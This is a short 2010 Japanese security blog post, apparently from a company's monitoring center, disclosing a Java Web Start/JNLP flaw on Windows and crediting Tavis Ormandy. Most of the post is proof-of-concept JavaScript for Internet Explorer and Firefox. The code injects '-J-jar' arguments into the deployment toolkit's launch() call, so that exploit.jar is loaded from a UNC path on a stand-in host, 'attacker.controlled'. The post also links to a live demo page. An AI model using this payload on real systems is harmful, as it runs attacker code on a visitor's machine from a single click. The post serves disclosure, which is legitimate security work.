日曜日, 4月 11, 2010

最新JDKのurl対応バグ(リモート実行権限問題)の再現方法(PoC)

Java Network Launch Protocol(jnlp) & JWS/javaws/java web startの新しいバグが今朝発見されました。

影響されたOS:Windows
影響されたバージョン:java 6 update 10のJDKとその以上

説明:
悪戯urlをクリックされたら、ローカルシステム環境を色々プログラム実行が出来ます。

再現方法は↓

■インターネットエクスプローラの再現コードはこんな感じ↓

/* ... */
var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

■Mozilla Firefoxブラウザーの再現コードはこんな感じ↓

/* ... */
var o = document.createElement("OBJECT");

o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

■もっとみたいなら下記のurlでデモが出来ます↓
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
credit Tavis Ormandy

---
株式会社ケイエルジェイテック
http://www.kljtech.com
セキュリティモニターセンター

0 件のコメント:

コメントを投稿